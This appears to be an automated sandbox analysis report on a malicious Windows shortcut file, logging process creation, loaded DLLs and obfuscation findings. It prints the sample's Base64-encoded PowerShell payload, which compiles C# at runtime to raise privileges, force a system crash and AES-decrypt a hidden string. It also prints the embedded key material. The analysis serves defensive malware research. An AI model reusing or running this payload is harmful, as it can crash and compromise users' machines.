Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 81Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 82Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 119Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 100Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 101Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 86Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 70Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 71Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 50Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 51Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 52Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 53Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 113Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 116Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 117Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 57Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 123Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 98Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 63Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 58Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 46Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 104Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 88Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 68Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c exit 69Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -e JABzAD0AJwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ASQBPADsAcAB1AGIAbABpAGMAIABjAGwAYQBzAHMAIABYAHsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdQBpAG4AdAAgAFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAaQBuAHQAIABwACwAYgBvAG8AbAAgAGUALABiAG8AbwBsACAAYwAsAG8AdQB0ACAAYgBvAG8AbAAgAG8AKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHUAaQBuAHQAIABOAHQAUgBhAGkAcwBlAEgAYQByAGQARQByAHIAbwByACgAdQBpAG4AdAAgAGUALAB1AGkAbgB0ACAAbgAsAHUAaQBuAHQAIAB1ACwASQBuAHQAUAB0AHIAIABwACwAdQBpAG4AdAAgAHYALABvAHUAdAAgAHUAaQBuAHQAIAByACkAOwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAdQBuAHMAYQBmAGUAIABzAHQAcgBpAG4AZwAgAFMAaABvAHQAKAApAHsAYgBvAG8AbAAgAG8AOwB1AGkAbgB0ACAAcgA7AFIAdABsAEEAZABqAHUAcwB0AFAAcgBpAHYAaQBsAGUAZwBlACgAMQA5ACwAdAByAHUAZQAsAGYAYQBsAHMAZQAsAG8AdQB0ACAAbwApADsATgB0AFIAYQBpAHMAZQBIAGEAcgBkAEUAcgByAG8AcgAoADAAeABjADAAMAAwADAAMAAyADIALAAwACwAMAAsAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsADYALABvAHUAdAAgAHIAKQA7AGIAeQB0AGUAWwBdAGMAPQBDAG8AbgB2AGUAcgB0AC4ARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAUgBOAG8AOABUAFoANQA2AFIAdgArAEUAeQBaAFcANwAzAE4AbwBjAEYATwBJAGkATgBGAGYATAA0ADUAdABYAHcAMgA0AFUAbwBnAEcAZABIAGsAcwB3AGUAYQAvAFcAaABuAE4AaABDAE4AdwBqAFEAbgAxAGEAVwBqAGYAdwAiACkAOwBiAHkAdABlAFsAXQBrAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAC8AYQAxAFkAKwBmAHMAcABxAC8ATgB3AGwAYwBQAHcAcABhAFQAMwBpAHIAWQAyAGgAYwBFAHkAdABrAHQAdQBIADcATABzAFkAKwBOAGwATABlAHcAPQAiACkAOwBiAHkAdABlAFsAXQBpAD0AQwBvAG4AdgBlAHIAdAAuAEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiADkAcwBYAEcAbQBLADQAcQA5AEwAZABZAEYAZABPAHAANABUAFMAcwBRAHcAPQA9ACIAKQA7AHUAcwBpAG4AZwAoAEEAZQBzACAAYQA9AEEAZQBzAC4AQwByAGUAYQB0AGUAKAApACkAewBhAC4ASwBlAHkAPQBrADsAYQAuAEkAVgA9AGkAOwBJAEMAcgB5AHAAdABvAFQAcgBhAG4AcwBmAG8AcgBtACAAZAA9AGEALgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoAGEALgBLAGUAeQAsAGEALgBJAFYAKQA7AHUAcwBpAG4AZwAoAHYAYQByACAAbQA9AG4AZQB3ACAATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKABjACkAKQB1AHMAaQBuAGcAKAB2AGEAcgAgAHkAPQBuAGUAdwAgAEMAcgB5AHAAdABvAFMAdAByAGUAYQBtACgAbQAsAGQALABDAHIAeQBwAHQAbwBTAHQAcgBlAGEAbQBNAG8AZABlAC4AUgBlAGEAZAApACkAdQBzAGkAbgBnACgAdgBhAHIAIABzAD0AbgBlAHcAIABTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAHkAKQApAHsAcgBlAHQAdQByAG4AIABzAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQB9AH0AfQAnADsAJABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AQwBvAGQAZQBEAG8AbQAuAEMAbwBtAHAAaQBsAGUAcgAuAEMAbwBtAHAAaQBsAGUAcgBQAGEAcgBhAG0AZQB0AGUAcgBzADsAJABjAC4AQwBvAG0AcABpAGwAZQByAE8AcAB0AGkAbwBuAHMAPQAnAC8AdQBuAHMAYQBmAGUAJwA7ACQAYQA9AEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAJABzACAALQBMAGEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7AF.tmp" "c:\Users\user\AppData\Local\Temp\pbkjdvqy\CSC3B4ECC64669B4C7AA39D189AE322B4F.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Windows PowerShell.lnkLNK file: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: :C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.pdb source: powershell.exe, 0000004B.00000002.2248209888.000002145EE74000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 75_2_00007FFD345700BD pushad ; iretd 75_2_00007FFD345700C1

Persistence and Installation Behavior

barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
